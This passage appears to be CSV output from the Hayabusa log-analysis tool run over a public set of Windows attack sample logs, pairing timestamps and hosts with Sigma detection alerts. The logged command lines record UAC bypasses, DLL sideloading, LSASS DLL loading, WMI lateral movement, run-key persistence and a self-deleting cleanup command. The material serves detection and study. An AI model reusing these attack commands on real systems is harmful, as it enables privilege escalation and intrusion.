Parent Command: C:\windows\system32\taskmgr.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/UACME_59_Sysmon.evtx +2020-10-06 05:43:58.451 +09:00,LAPTOP-JU4M3I0E,1,low,Taskmgr as Parent,,rules/sigma/process_creation/win_susp_taskmgr_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/UACME_59_Sysmon.evtx +2020-10-06 07:28:20.530 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,"Command: ""C:\windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: ""C:\Windows\System32\mmc.exe"" WF.msc",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_63.evtx +2020-10-06 07:28:20.530 +09:00,LAPTOP-JU4M3I0E,1,high,MMC Spawning Windows Shell,,rules/sigma/process_creation/win_mmc_spawn_shell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_63.evtx +2020-10-06 07:28:20.530 +09:00,LAPTOP-JU4M3I0E,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_63.evtx +2020-10-07 06:40:30.910 +09:00,02694w-win10.threebeesco.com,7,medium,Unsigned Image Loaded Into LSASS Process,,rules/sigma/image_load/sysmon_unsigned_image_loaded_into_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ImageLoad_NFSH_Sysmon_7.evtx +2020-10-07 06:40:42.943 +09:00,02694w-win10.threebeesco.com,7,medium,Unsigned Image Loaded Into LSASS Process,,rules/sigma/image_load/sysmon_unsigned_image_loaded_into_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ImageLoad_NFSH_Sysmon_7.evtx +2020-10-07 07:11:17.814 +09:00,02694w-win10.threebeesco.com,13,high,DLL Load via LSASS,,rules/sigma/registry_event/sysmon_susp_lsass_dll_load.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_regsvc_DirectoryServiceExtPt_Lsass_NTDS_AdamXpn.evtx +2020-10-07 07:11:17.848 +09:00,02694w-win10.threebeesco.com,12,high,DLL Load via LSASS,,rules/sigma/registry_event/sysmon_susp_lsass_dll_load.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_regsvc_DirectoryServiceExtPt_Lsass_NTDS_AdamXpn.evtx +2020-10-14 05:11:42.278 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,Command: c:\windows\system32\cmd.exe : Path: C:\Windows\System32\cmd.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: wuauclt.exe /UpdateDeploymentProvider C:\ProgramData\Intel\helpa.dll /RunHandlerComServer ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/evasion_execution_imageload_wuauclt_lolbas.evtx +2020-10-14 05:11:42.279 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,Command: c:\windows\system32\cmd.exe : Path: C:\Windows\System32\cmd.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: wuauclt.exe /UpdateDeploymentProvider C:\ProgramData\Intel\helpa.dll /RunHandlerComServer ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/evasion_execution_imageload_wuauclt_lolbas.evtx +2020-10-15 22:17:02.403 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\smartscreen.exe -Embedding : Path: C:\Windows\System32\smartscreen.exe : User: MSEDGEWIN10\IEUser : Parent Command: ?,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_injection_persistence_run_key.evtx +2020-10-15 22:17:02.736 +09:00,MSEDGEWIN10,13,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_injection_persistence_run_key.evtx +2020-10-15 22:17:02.736 +09:00,MSEDGEWIN10,13,medium,CurrentVersion Autorun Keys 
Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_injection_persistence_run_key.evtx +2020-10-15 22:17:02.736 +09:00,MSEDGEWIN10,13,high,New RUN Key Pointing to Suspicious Folder,,rules/sigma/registry_event/sysmon_susp_run_key_img_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_injection_persistence_run_key.evtx +2020-10-15 22:17:02.737 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Program Files (x86)\Internet Explorer\iexplore.exe"" : Path: C:\Program Files (x86)\Internet Explorer\iexplore.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Users\Public\tools\apt\tendyron.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_injection_persistence_run_key.evtx +2020-10-17 20:38:58.613 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Font Download : URL: https://fs.microsoft.com/fs/windows/config.json,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-17 20:43:27.499 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Users\Public\tools\apt\wwlib\test.exe"" : Path: C:\Users\Public\tools\apt\wwlib\test.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx +2020-10-17 20:43:27.499 +09:00,MSEDGEWIN10,1,high,Execution from Suspicious Folder,,rules/sigma/process_creation/win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx +2020-10-17 
20:43:31.484 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Users\Public\tools\apt\wwlib\test.exe"" : Path: C:\Users\Public\tools\apt\wwlib\test.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\SysWOW64\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx +2020-10-17 20:43:31.484 +09:00,MSEDGEWIN10,1,high,Execution from Suspicious Folder,,rules/sigma/process_creation/win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx +2020-10-17 20:43:31.484 +09:00,MSEDGEWIN10,1,high,CMSTP UAC Bypass via COM Object Access,,rules/sigma/process_creation/win_cmstp_com_object_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx +2020-10-17 20:43:33.495 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Users\IEUser\AppData\Roaming\WINWORD.exe --xStart : Path: C:\Users\IEUser\AppData\Roaming\WINWORD.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Users\Public\tools\apt\wwlib\test.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx +2020-10-17 20:43:36.306 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\rundll32.exe"" : Path: C:\Windows\SysWOW64\rundll32.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Users\IEUser\AppData\Roaming\WINWORD.exe --xStart",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx +2020-10-17 20:43:36.306 +09:00,MSEDGEWIN10,1,high,Microsoft Office Product Spawning Windows 
Shell,,rules/sigma/process_creation/win_office_shell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx +2020-10-17 20:43:40.902 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\explorer.exe"" : Path: C:\Windows\SysWOW64\explorer.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Users\IEUser\AppData\Roaming\WINWORD.exe --xStart",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx +2020-10-17 20:43:40.903 +09:00,MSEDGEWIN10,8,high,CACTUSTORCH Remote Thread Creation,,rules/sigma/create_remote_thread/sysmon_cactustorch.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx +2020-10-17 20:43:45.120 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Users\IEUser\AppData\Roaming\WINWORD.exe"" : Path: C:\Users\IEUser\AppData\Roaming\WINWORD.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Users\IEUser\AppData\Roaming\WINWORD.exe --xStart",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx +2020-10-17 20:43:45.120 +09:00,MSEDGEWIN10,1,high,MS Office Product Spawning Exe in User Dir,,rules/sigma/process_creation/win_office_spawn_exe_from_users_directory.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx +2020-10-17 20:43:49.229 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c ping 127.0.0.1&&del del /F /Q /A:H ""C:\Users\IEUser\AppData\Roaming\wwlib.dll"" : Path: C:\Windows\SysWOW64\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Users\IEUser\AppData\Roaming\WINWORD.exe 
--xStart",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx +2020-10-17 20:43:49.229 +09:00,MSEDGEWIN10,1,high,Microsoft Office Product Spawning Windows Shell,,rules/sigma/process_creation/win_office_shell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx +2020-10-17 20:50:02.661 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: C:\Users\IEUser\AppData\Local\Temp\{ACA8FE61-4C38-4216-A89C-9F88343DF21F}-GoogleUpdateSetup.exe : URL: http://r3---sn-5hnedn7z.gvt1.com/edgedl/release2/update2/HvaldRNSrX7_feOQD9wvGQ_1.3.36.32/GoogleUpdateSetup.exe?cms_redirect=yes&mh=Aq&mip=213.127.67.142&mm=28&mn=sn-5hnedn7z&ms=nvh&mt=1602935359&mv=m&mvi=3&pl=17&shardbypass=yes,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-17 21:32:08.987 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: C:\Users\IEUser\AppData\Local\Temp\{8B60600B-E6B4-4083-99F3-D3A4CFB95796}-86.0.4240.75_85.0.4183.121_chrome_updater.exe : URL: http://r2---sn-5hne6nsr.gvt1.com/edgedl/release2/chrome/W_YanCvPLKRFNu-eN8kKOw_86.0.4240.75/86.0.4240.75_85.0.4183.121_chrome_updater.exe?cms_redirect=yes&mh=ps&mip=213.127.67.142&mm=28&mn=sn-5hne6nsr&ms=nvh&mt=1602937879&mv=m&mvi=2&pl=17&shardbypass=yes,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-17 21:32:11.026 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and 
Control/bits_openvpn.evtx +2020-10-17 21:32:11.318 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-17 21:32:11.574 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: SetupBinary : URL: https://oneclient.sfx.ms/Win/Prod/20.169.0823.0006/OneDriveSetup.exe,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-17 21:33:56.406 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-18 01:27:08.081 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: calc.exe : Path: C:\Windows\SysWOW64\calc.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\ProgramData\Intel\CV.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sideloading_wwlib_sysmon_7_1_11.evtx +2020-10-18 01:27:08.734 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.2008.2.0_x64__8wekyb3d8bbwe\Calculator.exe"" -ServerName:App.AppXsm3pg4n7er43kdh1qp4e79f1j7am68r8.mca : Path: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.2008.2.0_x64__8wekyb3d8bbwe\Calculator.exe : User: MSEDGEWIN10\IEUser : Parent Command: ?",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sideloading_wwlib_sysmon_7_1_11.evtx +2020-10-18 01:27:10.464 
+09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\RuntimeBroker.exe -Embedding : Path: C:\Windows\System32\RuntimeBroker.exe : User: MSEDGEWIN10\IEUser : Parent Command: ?,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sideloading_wwlib_sysmon_7_1_11.evtx +2020-10-18 07:37:52.809 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1a7GBU.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-18 07:37:52.892 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1a7GBU.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-18 07:37:52.956 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1a7GBU.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-18 07:37:52.991 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: 
https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1a7GBU.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-18 07:37:53.047 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161340731555_Images/LiveTileImages/MediumAndLarge/Image1.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-18 07:37:53.111 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161340731555_Images/LiveTileImages/MediumAndLarge/Image1.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-18 07:37:53.169 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161340731555_Images/LiveTileImages/MediumAndLarge/Image1.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-18 07:37:53.230 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161340731555_Images/LiveTileImages/MediumAndLarge/Image1.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-18 07:37:53.417 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: 
https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1a7GBU.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-18 07:37:53.527 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1a7GBU.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-18 07:37:53.571 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1a7GBU.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-18 07:37:53.664 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1a7GBU.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-18 07:37:53.771 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161340731555_Images/LiveTileImages/MediumAndLarge/Image1.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 
+2020-10-18 07:37:53.807 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161340731555_Images/LiveTileImages/MediumAndLarge/Image1.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-18 07:37:53.867 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161340731555_Images/LiveTileImages/MediumAndLarge/Image1.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-18 07:37:53.928 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161340731555_Images/LiveTileImages/MediumAndLarge/Image1.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-18 07:53:05.436 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: cmd.exe /Q /c cd \ 1> \\127.0.0.1\C$\WqEVwJZYOe 2>&1 : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\Administrator : Parent Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx +2020-10-18 07:53:05.436 +09:00,MSEDGEWIN10,1,high,Wmiprvse Spawning Process,,rules/sigma/process_creation/win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx +2020-10-18 07:53:05.676 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: cmd.exe /Q /c cd 1> \\127.0.0.1\C$\WqEVwJZYOe 2>&1 : Path: C:\Windows\System32\cmd.exe : 
User: MSEDGEWIN10\Administrator : Parent Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx +2020-10-18 07:53:05.676 +09:00,MSEDGEWIN10,1,high,Wmiprvse Spawning Process,,rules/sigma/process_creation/win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx +2020-10-18 07:53:05.777 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd.exe /Q /c c:\windows\system32\rundll32.exe c:\programdata\7okjer,#1 1> \\127.0.0.1\C$\WqEVwJZYOe 2>&1 : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\Administrator : Parent Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx +2020-10-18 07:53:05.777 +09:00,MSEDGEWIN10,1,high,Wmiprvse Spawning Process,,rules/sigma/process_creation/win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx +2020-10-20 20:50:54.810 +09:00,DESKTOP-NTSSLJD,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1059.001,technique_name=PowerShell : Command: ""C:\Users\den\Source\Repos\UACME\Source\Akagi\output\x64\Release\Akagi64.exe"" 64 : Path: C:\Users\den\Source\Repos\UACME\Source\Akagi\output\x64\Release\Akagi64.exe : User: DESKTOP-NTSSLJD\den : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx +2020-10-20 20:50:54.810 +09:00,DESKTOP-NTSSLJD,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege 
Escalation/Sysmon_UACME_64.evtx +2020-10-20 20:50:55.450 +09:00,DESKTOP-NTSSLJD,11,high,UAC Bypass Using IEInstal - File,,rules/sigma/file_event/sysmon_uac_bypass_ieinstal.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx +2020-10-20 20:50:56.490 +09:00,DESKTOP-NTSSLJD,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1036,technique_name=Masquerading : Command: C:\Users\den\AppData\Local\Temp\IDC1.tmp\[1]consent.exe : Path: C:\Users\den\AppData\Local\Temp\IDC1.tmp\[1]consent.exe : User: DESKTOP-NTSSLJD\den : Parent Command: ""C:\Program Files\Internet Explorer\IEInstal.exe"" -Embedding",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx +2020-10-20 20:50:56.490 +09:00,DESKTOP-NTSSLJD,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx +2020-10-20 20:50:56.490 +09:00,DESKTOP-NTSSLJD,1,high,UAC Bypass Using IEInstal - Process,,rules/sigma/process_creation/win_uac_bypass_ieinstal.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx +2020-10-20 20:50:56.569 +09:00,DESKTOP-NTSSLJD,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1059.003,technique_name=Windows Command Shell : Command: ""C:\Windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: DESKTOP-NTSSLJD\den : Parent Command: C:\Users\den\AppData\Local\Temp\IDC1.tmp\[1]consent.exe",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx +2020-10-21 07:33:02.063 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\system32\wermgr.exe : Path: C:\Windows\System32\wermgr.exe : User: MSEDGEWIN10\IEUser : Parent Command: rundll32.exe 
